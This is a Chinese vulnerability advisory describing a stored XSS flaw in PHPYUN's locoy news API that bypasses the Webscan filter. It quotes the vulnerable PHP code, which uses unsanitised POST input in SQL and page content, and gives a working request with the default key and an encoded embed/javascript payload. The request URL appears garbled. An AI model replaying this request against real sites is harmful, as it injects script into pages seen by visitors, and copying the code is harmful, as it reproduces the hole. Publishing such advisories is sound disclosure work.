PHPYUN绕过Webscan向主页推送XSS招聘信息

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: PHPYUN绕过Webscan向主页推送XSS招聘信息 ### 详细说明: api/locoy/model/news.class.php: ``` class news_controller extends common{ function addnews_action(){//新闻添加 include("locoy_config.php"); if($locoyinfo['locoy_online']!=1){ echo 4;die; } if($locoyinfo['locoy_key']!=trim($_GET['key'])){ echo 5;die; } if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){ echo 2;die; } $row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'"); if(is_array($row)){ echo 3;die; } $content=$_POST['content']; ``` 发送url: http://localhost/phpyun40https://images.seebug.org/upload/api/locoy/index.php?admin_dir=admin&m=news&c=addnews&key=phpyun postdata: title=%D7%EE%D0%C2%D5%D0%C6%B8&color=%23E53333&content=%3Cembed%20src%3D%22javascript%3Aalert%281%29%22%2f%3E&nid=511112671&keyword=xxxxxx 查看主页: [<img src="https://images.seebug.org/upload/201507/2322292073fd8267a4252df7dd2effcd59611387.png" alt="1.png" width="600"...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息